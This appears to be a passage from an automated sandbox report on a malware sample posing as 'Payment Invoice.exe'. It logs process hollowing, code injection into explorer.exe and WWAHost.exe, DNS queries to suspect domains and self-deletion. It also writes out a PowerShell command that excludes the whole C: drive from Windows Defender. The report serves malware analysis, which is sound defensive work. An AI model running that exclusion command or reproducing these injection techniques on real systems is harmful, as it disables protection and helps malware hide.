                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AAE44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AAE44 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0379FE3F mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EE620 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371A61C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0371A61C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EC600 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03718E00 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037A1608 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F76E2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037116E0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B8ED6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03728EC7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0379FEC0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037136CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037646A7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B0EA5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0377FE87 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370C577 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0370C577 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03707D50 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03723D43 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03763540 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03793D40 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_0376A537 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AE539 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03714D3B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037B8D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036F3D34 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036EAD30 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03798DF1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FD5E0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_036FD5E0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_037AFDE2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03766DC9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 21_2_03711DB5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: www.the-techs.info
                      Source: C:\Windows\explorer.exeDomain query: www.minterfortexas.com
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory allocated: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000 value starts with: 4D5A
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeThread register set: target process: 3424
                      Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
                      Queues an APC in another process (thread injection)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeThread APC queued: target process: C:\Windows\explorer.exe
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 240000
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 400000
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: 401000
                      Source: C:\Users\user\Desktop\Payment Invoice.exeMemory written: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe base: F03008
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                      Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe'
                      Source: explorer.exe, 0000000F.00000002.908741366.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
                      Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000F.00000000.751225821.0000000005E50000.00000004.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000000F.00000000.721993476.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000015.00000002.913156402.0000000004D50000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Users\user\Desktop\Payment Invoice.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
